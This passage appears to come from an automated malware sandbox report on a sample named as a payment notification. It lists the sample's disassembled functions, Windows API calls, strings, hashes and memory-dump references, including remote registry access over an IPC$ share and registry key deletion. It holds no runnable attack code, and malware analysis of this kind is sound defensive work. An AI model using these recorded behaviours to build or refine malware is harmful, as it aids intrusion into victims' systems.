API ID: ClassName$Window$Text$BuffCharRectUpper_wcslen_wcsstr
String ID: ThumbnailClass
API String ID: 1311036022-1241985126
Opcode ID: dcfca6aa5332b3a18c21375f036c936df2093bb4432e7e8d64a95b369b8c609a
Instruction ID: 934c0d4284d1f1ad5ed26c5ec9735181032978724f720298fade347609f619e2
Opcode Fuzzy Hash: dcfca6aa5332b3a18c21375f036c936df2093bb4432e7e8d64a95b369b8c609a
Instruction Fuzzy Hash: FB919C710082069FDF06CF18C985FAA77ECEF84314F048469FD899A196EB34ED46CBA1

Function 009C8D0E Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 221windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00949BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00949BB2

PostMessageW.USER32(?,00000111,00000000,00000000), ref: 009C8D5A
GetFocus.USER32 ref: 009C8D6A
GetDlgCtrlID.USER32(00000000), ref: 009C8D75
DefDlgProcW.USER32(?,00000111,?,?,00000000,?,?,?,?,?,?,?), ref: 009C8E1D
GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 009C8ECF
GetMenuItemCount.USER32(?), ref: 009C8EEC
GetMenuItemID.USER32(?,00000000), ref: 009C8EFC
GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 009C8F2E
GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 009C8F70
CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 009C8FA1

Strings

0, xrefs: 009C8E9F

Memory Dump Source

Source File: 00000000.00000002.1319441131.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true

Associated: 00000000.00000002.1319421141.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319587735.00000000009FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319609733.0000000000A04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_930000_Payment Notification Confirmation 010_01_2025.jbxd

Similarity

API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow
String ID: 0
API String ID: 1026556194-4108050209
Opcode ID: 03854de7f08a4411a987abcdd4a50a0ff4a5d185cf047ec8ca40eb5bc31d4e90
Instruction ID: 2bd55b4d6167327e4f1e690d28a261faaeaebc34a863018e9bac649f68bc528b
Opcode Fuzzy Hash: 03854de7f08a4411a987abcdd4a50a0ff4a5d185cf047ec8ca40eb5bc31d4e90
Instruction Fuzzy Hash: 1281ACB1908301AFDB10DF24D984FABBBE9FB89354F14091DF98997291DB30D901DBA2

Function 0099DC0E Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 178COMMON

Download Yara Rule

APIs

GetFileVersionInfoSizeW.VERSION(?,?), ref: 0099DC20
GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 0099DC46
_wcslen.LIBCMT ref: 0099DC50
_wcsstr.LIBVCRUNTIME ref: 0099DCA0
VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 0099DCBC

Strings

DefaultLangCodepage, xrefs: 0099DD1F
StringFileInfo\, xrefs: 0099DC8F
\VarFileInfo\Translation, xrefs: 0099DCB4
%u.%u.%u.%u, xrefs: 0099DD9A
04090000, xrefs: 0099DCF2

Memory Dump Source

Source File: 00000000.00000002.1319441131.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true

Associated: 00000000.00000002.1319421141.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319587735.00000000009FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319609733.0000000000A04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_930000_Payment Notification Confirmation 010_01_2025.jbxd

Similarity

API ID: FileInfoVersion$QuerySizeValue_wcslen_wcsstr
String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
API String ID: 1939486746-1459072770
Opcode ID: 3267d8a25dae52e8ce596d5944cb929d5606a3c2d4f107ff1695caae7ecaa31f
Instruction ID: 9fafe81dd1c901e8fdeb14720d6d5d48cf953c41c2a6c3a2e65c7d8e2e8b8e2c
Opcode Fuzzy Hash: 3267d8a25dae52e8ce596d5944cb929d5606a3c2d4f107ff1695caae7ecaa31f
Instruction Fuzzy Hash: 744143729002057AEB04AB799C43FBF3BACEF82751F100469F904B61C2EB74990087A1

Function 009BCC34 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 104registryCOMMON

Download Yara Rule

APIs

RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 009BCC64
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?,?,00000000), ref: 009BCC8D
FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 009BCD48

Part of subcall function 009BCC34: RegCloseKey.ADVAPI32(?,?,?,00000000), ref: 009BCCAA
Part of subcall function 009BCC34: LoadLibraryA.KERNEL32(advapi32.dll,?,?,00000000), ref: 009BCCBD
Part of subcall function 009BCC34: GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 009BCCCF
Part of subcall function 009BCC34: FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 009BCD05
Part of subcall function 009BCC34: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 009BCD28

RegDeleteKeyW.ADVAPI32(?,?), ref: 009BCCF3

Strings

RegDeleteKeyExW, xrefs: 009BCCC9
advapi32.dll, xrefs: 009BCCB8

Memory Dump Source

Source File: 00000000.00000002.1319441131.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true

Associated: 00000000.00000002.1319421141.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319587735.00000000009FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319609733.0000000000A04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_930000_Payment Notification Confirmation 010_01_2025.jbxd

Similarity

API ID: Library$EnumFree$AddressCloseDeleteLoadOpenProc
String ID: RegDeleteKeyExW$advapi32.dll
API String ID: 2734957052-4033151799
Opcode ID: 337f1d61e5972a35d37c529048fa22699143b9b10e886f43de3ee31fff6b37f9
Instruction ID: bfe8a00f375709fc0a1648d597101bb61d998c84ca42d963a153cb160131f297
Opcode Fuzzy Hash: 337f1d61e5972a35d37c529048fa22699143b9b10e886f43de3ee31fff6b37f9
Instruction Fuzzy Hash: C93180B5D01129BBDB208B51DD88EFFBF7CEF95760F000569E909E2240D7349A45EBA0

Function 0099E6B0 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 72sleepwindowtimeCOMMON

Download Yara Rule

APIs

timeGetTime.WINMM ref: 0099E6B4

Part of subcall function 0094E551: timeGetTime.WINMM(?,?,0099E6D4), ref: 0094E555

Sleep.KERNEL32(0000000A), ref: 0099E6E1
EnumThreadWindows.USER32(?,Function_0006E665,00000000), ref: 0099E705
FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 0099E727
SetActiveWindow.USER32 ref: 0099E746
SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 0099E754
SendMessageW.USER32(00000010,00000000,00000000), ref: 0099E773
Sleep.KERNEL32(000000FA), ref: 0099E77E
IsWindow.USER32 ref: 0099E78A
EndDialog.USER32(00000000), ref: 0099E79B

Strings

BUTTON, xrefs: 0099E719

Memory Dump Source

Source File: 00000000.00000002.1319441131.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true

Associated: 00000000.00000002.1319421141.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319587735.00000000009FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319609733.0000000000A04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_930000_Payment Notification Confirmation 010_01_2025.jbxd

Similarity

API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
String ID: BUTTON
API String ID: 1194449130-3405671355
Opcode ID: aa5bde28bb8fa10d0b5038f2a3f0ef80691186cc1bcc316a2a48757c40e1ceee
Instruction ID: 1a8d55dca32c33e94d5d4e2d2a1ba5da6ea64eebe82a61e9f208a2839fb872e9
Opcode Fuzzy Hash: aa5bde28bb8fa10d0b5038f2a3f0ef80691186cc1bcc316a2a48757c40e1ceee
Instruction Fuzzy Hash: B4218EB0618349AFEF00EFA8ED8DF263F6DF754749F140424F509821A1DB72AC42AB25

Function 0099E9FC Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 71COMMON

Download Yara Rule

APIs

Part of subcall function 00939CB3: _wcslen.LIBCMT ref: 00939CBD

mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 0099EA5D
mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 0099EA73
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0099EA84
mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 0099EA96
mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 0099EAA7

Strings

open , xrefs: 0099EA0C
play PlayMe wait, xrefs: 0099EA91
play PlayMe, xrefs: 0099EAA2
alias PlayMe, xrefs: 0099EA36
close PlayMe, xrefs: 0099EA6E, 0099EA9B
status PlayMe mode, xrefs: 0099EA58

Memory Dump Source

Source File: 00000000.00000002.1319441131.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true

Associated: 00000000.00000002.1319421141.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319587735.00000000009FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319609733.0000000000A04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_930000_Payment Notification Confirmation 010_01_2025.jbxd

Similarity

API ID: SendString$_wcslen
String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
API String ID: 2420728520-1007645807
Opcode ID: 16558a03d1e894b3f3aa37a790bb763edf8e1cb5383d07a87ccc83205d41b355
Instruction ID: 974cde6430f869a1de13d0b042c9c9065ec08ed3d79a7a252dfead4e1b52918e
Opcode Fuzzy Hash: 16558a03d1e894b3f3aa37a790bb763edf8e1cb5383d07a87ccc83205d41b355
Instruction Fuzzy Hash: 08117331A9131D79DB20E7A5DC4AEFF6ABCEBD1F44F404429B501A20D1EEB05D45CAB0

Function 00995CC6 Relevance: 18.2, APIs: 12, Instructions: 173COMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,00000001), ref: 00995CE2
GetWindowRect.USER32(00000000,?), ref: 00995CFB
MoveWindow.USER32(?,0000000A,00000004,?,?,00000004,00000000), ref: 00995D59
GetDlgItem.USER32(?,00000002), ref: 00995D69
GetWindowRect.USER32(00000000,?), ref: 00995D7B
MoveWindow.USER32(?,?,00000004,00000000,?,00000004,00000000), ref: 00995DCF
GetDlgItem.USER32(?,000003E9), ref: 00995DDD
GetWindowRect.USER32(00000000,?), ref: 00995DEF
MoveWindow.USER32(?,0000000A,00000000,?,00000004,00000000), ref: 00995E31
GetDlgItem.USER32(?,000003EA), ref: 00995E44
MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 00995E5A
InvalidateRect.USER32(?,00000000,00000001), ref: 00995E67

Memory Dump Source

Source File: 00000000.00000002.1319441131.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true

Associated: 00000000.00000002.1319421141.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319587735.00000000009FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319609733.0000000000A04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_930000_Payment Notification Confirmation 010_01_2025.jbxd

Similarity

API ID: Window$ItemMoveRect$Invalidate
String ID:
API String ID: 3096461208-0
Opcode ID: 1b2c8c20ac26e7c17d0e1a8ead42d82ace6b8573eb7467b426c931692f84fbfc
Instruction ID: 52e4951da3688526df30dfef8b7c1d27faa35ddca04b769268e142519e519143
Opcode Fuzzy Hash: 1b2c8c20ac26e7c17d0e1a8ead42d82ace6b8573eb7467b426c931692f84fbfc
Instruction Fuzzy Hash: 4951FFB1E10605AFDF19CFA8DE89EAE7BB9FB48300F558129F519E6290D7709E04CB50

Function 00948BCD Relevance: 18.2, APIs: 12, Instructions: 168timeCOMMON

Download Yara Rule

APIs

Part of subcall function 00948F62: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00948BE8,?,00000000,?,?,?,?,00948BBA,00000000,?), ref: 00948FC5

DestroyWindow.USER32(?), ref: 00948C81
KillTimer.USER32(00000000,?,?,?,?,00948BBA,00000000,?), ref: 00948D1B
DestroyAcceleratorTable.USER32(00000000), ref: 00986973
ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,00000000,?,?,?,?,00948BBA,00000000,?), ref: 009869A1
ImageList_Destroy.COMCTL32(?,?,?,?,?,?,?,00000000,?,?,?,?,00948BBA,00000000,?), ref: 009869B8
ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,?,?,00000000,?,?,?,?,00948BBA,00000000), ref: 009869D4
DeleteObject.GDI32(00000000), ref: 009869E6

Memory Dump Source

Source File: 00000000.00000002.1319441131.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true

Associated: 00000000.00000002.1319421141.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319587735.00000000009FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319609733.0000000000A04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_930000_Payment Notification Confirmation 010_01_2025.jbxd

Similarity

API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
String ID:
API String ID: 641708696-0
Opcode ID: aa024ebf68265ddcaa341baa5563f31505976c3f7263b2fd30ea421574af8883
Instruction ID: 01b332f96a60663154d0440a594519245dfe2d446648b61d2393dae9ecc90673
Opcode Fuzzy Hash: aa024ebf68265ddcaa341baa5563f31505976c3f7263b2fd30ea421574af8883
Instruction Fuzzy Hash: 1B61BF31902614DFCB25EF64DA88F6A7BF5FB40312F14491CE0869B6A0CB35AD82DF90

Function 00949838 Relevance: 18.1, APIs: 12, Instructions: 137COMMON

Download Yara Rule

APIs

Part of subcall function 00949944: GetWindowLongW.USER32(?,000000EB), ref: 00949952

GetSysColor.USER32(0000000F), ref: 00949862

Memory Dump Source

Source File: 00000000.00000002.1319441131.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true

Associated: 00000000.00000002.1319421141.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319587735.00000000009FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319609733.0000000000A04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_930000_Payment Notification Confirmation 010_01_2025.jbxd

Similarity

API ID: ColorLongWindow
String ID:
API String ID: 259745315-0
Opcode ID: bfcdffdbad99b93f9cd12eb943ba4125b49a4ae77c95184a6dcb5e955451d4f2
Instruction ID: 2876a9a9db555f5a673eeff6de75b617e49db86a16f7620812c0efa827852f4e
Opcode Fuzzy Hash: bfcdffdbad99b93f9cd12eb943ba4125b49a4ae77c95184a6dcb5e955451d4f2
Instruction Fuzzy Hash: A041B571508644AFDB209F7C9C94FBA3B69EB46330F284615FAA6872E1D735DC42EB10

Function 009996E2 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 137windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000001,00000000,?,?,0097F7F8,00000001,0000138C,00000001,?,00000001,00000000,?,?), ref: 00999717
LoadStringW.USER32(00000000,?,0097F7F8,00000001), ref: 00999720

Part of subcall function 00939CB3: _wcslen.LIBCMT ref: 00939CBD

GetModuleHandleW.KERNEL32(00000000,00000001,?,00000FFF,?,?,0097F7F8,00000001,0000138C,00000001,?,00000001,00000000,?,?,00000000), ref: 00999742
LoadStringW.USER32(00000000,?,0097F7F8,00000001), ref: 00999745
MessageBoxW.USER32(00000000,00000000,?,00011010), ref: 00999866

Strings

%s (%d) : ==> %s: %s %s, xrefs: 0099984A
Error: , xrefs: 0099981D
Line %d:, xrefs: 009997A0
^ ERROR, xrefs: 009997FB
Line %d (File "%s"):, xrefs: 0099978F

Memory Dump Source

Source File: 00000000.00000002.1319441131.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true

Associated: 00000000.00000002.1319421141.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319587735.00000000009FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319609733.0000000000A04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_930000_Payment Notification Confirmation 010_01_2025.jbxd

Similarity

API ID: HandleLoadModuleString$Message_wcslen
String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
API String ID: 747408836-2268648507
Opcode ID: 2cb55edcb2a69be6f2ca32203a1516cab7369ace2f05eaa06928ce6d70ad11e8
Instruction ID: 419d3e4330ac9eaf950a5c6a5c8b86a0937c3e91616e665534aa7145a9a5b50a
Opcode Fuzzy Hash: 2cb55edcb2a69be6f2ca32203a1516cab7369ace2f05eaa06928ce6d70ad11e8
Instruction Fuzzy Hash: 61413972844209AACF04EBE4DE86FEEB778AF95340F504029F60572092EA656F49CF61

Function 009906DE Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 127registryshareCOMMON

Download Yara Rule

APIs

Part of subcall function 00936B57: _wcslen.LIBCMT ref: 00936B6A

WNetAddConnection2W.MPR(?,?,?,00000000), ref: 009907A2
RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 009907BE
RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 009907DA
RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 00990804
CLSIDFromString.OLE32(?,000001FE,?,SOFTWARE\Classes\), ref: 0099082C
RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00990837
RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 0099083C

Strings

SOFTWARE\Classes\, xrefs: 0099070E
\CLSID, xrefs: 00990724
\IPC$, xrefs: 00990784

Memory Dump Source

Source File: 00000000.00000002.1319441131.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true

Associated: 00000000.00000002.1319421141.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319587735.00000000009FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319609733.0000000000A04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_930000_Payment Notification Confirmation 010_01_2025.jbxd

Similarity

API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_wcslen
String ID: SOFTWARE\Classes\$\CLSID$\IPC$
API String ID: 323675364-22481851
Opcode ID: 39e5e3ec1f88fa2e02b2c436d18d5ac466ca3d615c459e680c268c7a77ac3fec
Instruction ID: ba1a99b031112a6da990ec187b36b02d15c6f7494f9f889b7bb1a953ddffed64
Opcode Fuzzy Hash: 39e5e3ec1f88fa2e02b2c436d18d5ac466ca3d615c459e680c268c7a77ac3fec
Instruction Fuzzy Hash: 8F4115B2C14229AFCF15EBA4DC85EEDB778BF84350F448129E915A3161EB709E44CFA0

Function 009B3C30 Relevance: 16.8, APIs: 11, Instructions: 344fileCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 009B3C5C
CoInitialize.OLE32(00000000), ref: 009B3C8A
CoUninitialize.OLE32 ref: 009B3C94
_wcslen.LIBCMT ref: 009B3D2D
GetRunningObjectTable.OLE32(00000000,?), ref: 009B3DB1
SetErrorMode.KERNEL32(00000001,00000029), ref: 009B3ED5
CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,?), ref: 009B3F0E
CoGetObject.OLE32(?,00000000,009CFB98,?), ref: 009B3F2D
SetErrorMode.KERNEL32(00000000), ref: 009B3F40
SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 009B3FC4
VariantClear.OLEAUT32(?), ref: 009B3FD8

Memory Dump Source

Source File: 00000000.00000002.1319441131.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true

Associated: 00000000.00000002.1319421141.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319587735.00000000009FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319609733.0000000000A04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_930000_Payment Notification Confirmation 010_01_2025.jbxd

Similarity

API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize_wcslen
String ID:
API String ID: 429561992-0
Opcode ID: fd0ee0e2b6ec55e7620465fadacfae439f19eab13538e7fa700ccc974294968a
Instruction ID: c493938247546ae6c2e85e59a90b3033155213ec5bfdbde13839f1366dd56bd5
Opcode Fuzzy Hash: fd0ee0e2b6ec55e7620465fadacfae439f19eab13538e7fa700ccc974294968a
Instruction Fuzzy Hash: BEC134B16082059FD700DF68C984A6BBBE9FF89754F14891DF98A9B250DB30EE05CB52

Function 009A7A96 Relevance: 16.8, APIs: 11, Instructions: 298comCOMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 009A7AF3
SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 009A7B8F
SHGetDesktopFolder.SHELL32(?), ref: 009A7BA3
CoCreateInstance.OLE32(009CFD08,00000000,00000001,009F6E6C,?), ref: 009A7BEF
SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 009A7C74
CoTaskMemFree.OLE32(?,?), ref: 009A7CCC
SHBrowseForFolderW.SHELL32(?), ref: 009A7D57
SHGetPathFromIDListW.SHELL32(00000000,?), ref: 009A7D7A
CoTaskMemFree.OLE32(00000000), ref: 009A7D81
CoTaskMemFree.OLE32(00000000), ref: 009A7DD6
CoUninitialize.OLE32 ref: 009A7DDC

Memory Dump Source

Source File: 00000000.00000002.1319441131.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true

Associated: 00000000.00000002.1319421141.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319587735.00000000009FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319609733.0000000000A04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_930000_Payment Notification Confirmation 010_01_2025.jbxd

Similarity

API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize
String ID:
API String ID: 2762341140-0
Opcode ID: c8a470d5307faf0924af366fc55a2aa7757952c39617bcaa987c5cec9502bbf8
Instruction ID: 677b983c2b47496044f3fca553f47b749aa5e8bba3a61a9327fc7a27ca877a65
Opcode Fuzzy Hash: c8a470d5307faf0924af366fc55a2aa7757952c39617bcaa987c5cec9502bbf8
Instruction Fuzzy Hash: C0C10975A04209AFCB14DFA4C885EAEBBB9FF49314F148499F81A9B261D730ED45CF90

Function 009C541D Relevance: 16.7, APIs: 11, Instructions: 191windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 009C5504
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 009C5515
CharNextW.USER32(00000158), ref: 009C5544
SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 009C5585
SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 009C559B
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 009C55AC

Memory Dump Source

Source File: 00000000.00000002.1319441131.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true

Associated: 00000000.00000002.1319421141.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319587735.00000000009FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319609733.0000000000A04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_930000_Payment Notification Confirmation 010_01_2025.jbxd

Similarity

API ID: MessageSend$CharNext
String ID:
API String ID: 1350042424-0
Opcode ID: 7687e6ac16aa83b0995d2312c2f1aa1ce2c76eaf32f128a1737270bd956bb2ee
Instruction ID: 1cbd9e701e6cd9434b7792bb004eccd646a445fd45864bf4cf069d924b465155
Opcode Fuzzy Hash: 7687e6ac16aa83b0995d2312c2f1aa1ce2c76eaf32f128a1737270bd956bb2ee
Instruction Fuzzy Hash: 2761BD70D04609ABDF108F94CD84FFE7BB9EB09320F118449F925A72A1D734AAC1DB62

Function 0098FA88 Relevance: 16.6, APIs: 11, Instructions: 122memoryCOMMON

Download Yara Rule

APIs

SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 0098FAAF
SafeArrayAllocData.OLEAUT32(?), ref: 0098FB08
VariantInit.OLEAUT32(?), ref: 0098FB1A
SafeArrayAccessData.OLEAUT32(?,?), ref: 0098FB3A
VariantCopy.OLEAUT32(?,?), ref: 0098FB8D
SafeArrayUnaccessData.OLEAUT32(?), ref: 0098FBA1
VariantClear.OLEAUT32(?), ref: 0098FBB6
SafeArrayDestroyData.OLEAUT32(?), ref: 0098FBC3
SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 0098FBCC
VariantClear.OLEAUT32(?), ref: 0098FBDE
SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 0098FBE9

Memory Dump Source

Source File: 00000000.00000002.1319441131.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true

Associated: 00000000.00000002.1319421141.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
